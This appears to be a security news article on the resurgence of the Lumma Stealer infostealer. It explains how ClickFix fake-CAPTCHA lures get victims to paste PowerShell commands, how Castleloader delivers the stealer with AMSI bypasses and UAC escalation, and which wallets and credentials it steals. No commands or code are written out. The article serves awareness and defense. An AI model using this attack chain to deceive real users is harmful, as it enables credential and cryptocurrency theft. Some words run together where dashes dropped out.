Lumma Stealer Resurges with Irresistible ClickFix Lures

The Lumma Stealer, a prolific information-stealing malware available via Malware-as-a-Service (MaaS) since 2022, has staged a significant resurgence. Once disrupted by law enforcement in May 2025, which neutralized over 2,300 command-and-control domains, operators migrated to bulletproof hosting providers. Recent campaigns leverage ClickFix baitfake CAPTCHA promptsand the advanced Castleloader downloader to deploy Lumma at unprecedented scale, as detailed in Ars Technica's February 2026 report.

Developed by threat actor 'Shamel' (alias 'Lumma'), this C-language stealer targets cryptocurrency wallets, 2FA browser extensions, credentials, cookies, and documents. Its MaaS model enables global affiliates to lease it, fueling hundreds of thousands of infections across industries like healthcare, banking, and telecom.

ClickFix techniques trick users into executing malicious commands via Windows Run dialog, bypassing browser defenses. Victims encounter fake CAPTCHAs on malvertising sites, instructed to paste PowerShell code from their clipboardoften disguised as verification steps. This social engineering evades detection, as users unwittingly download payloads outside browsers.

Castleloader, a sophisticated loader, then fetches Lumma. It employs evasion tactics like AMSI bypasses and employs modules for UAC escalation and file manipulation. Campaigns use lures such as cracked software, fake games, and adult-themed downloads, amplifying reach.

• Fake CAPTCHAs prompt clipboard command execution.
• PowerShell retrieves initial payloads from C2 servers.
• Castleloader deploys Lumma, exfiltrating data via HTTP POST.

Lumma's impact extends beyond theft. It grabs browser sessions for account takeovers, cryptocurrency keys for wallet drains, and documents for identity fraud or extortion. Victims face immediate lossesstolen fundsand long-term threats like targeted phishing using harvested personal files. For businesses, infections in telecom or banking sectors enable corporate breaches and secondary crimes.

One realistic scenario: A marketing professional downloads 'free' cracked software from a malvertising site. A ClickFix CAPTCHA prompts pasting a command; Lumma installs silently, stealing 2FA tokens and crypto wallet data. Days later, attackers drain $10,000 in Bitcoin and access corporate email for spear-phishing.

Lumma uses TeslaBrowser/5.5 user-agent for C2 communication and targets apps like email clients, FTP, and VPNs. Affiliates at premium tiers access source code for customization. Post-2025 takedown, resilient infrastructure on uncooperative hosts sustained operations.

Defenses include behavioral monitoring for clipboard anomalies and PowerShell abuse. Endpoint tools flag AMSI bypasses; user training counters ClickFix deception.

As Lumma evolves with loaders like Castleloader and HijackLoader, expect scaled campaigns blending social engineering and evasion. Law enforcement faces challenges from bulletproof hosting, potentially increasing MaaS proliferation. Organizations must prioritize MDR services and zero-trust models to mitigate infostealer risks. For everyday users, vigilance against CAPTCHA tricks remains crucialverify prompts before executing commands.

Security teams worldwide report heightened Lumma activity, underscoring how one individual's lapse can cascade into widespread harm for families and firms alike.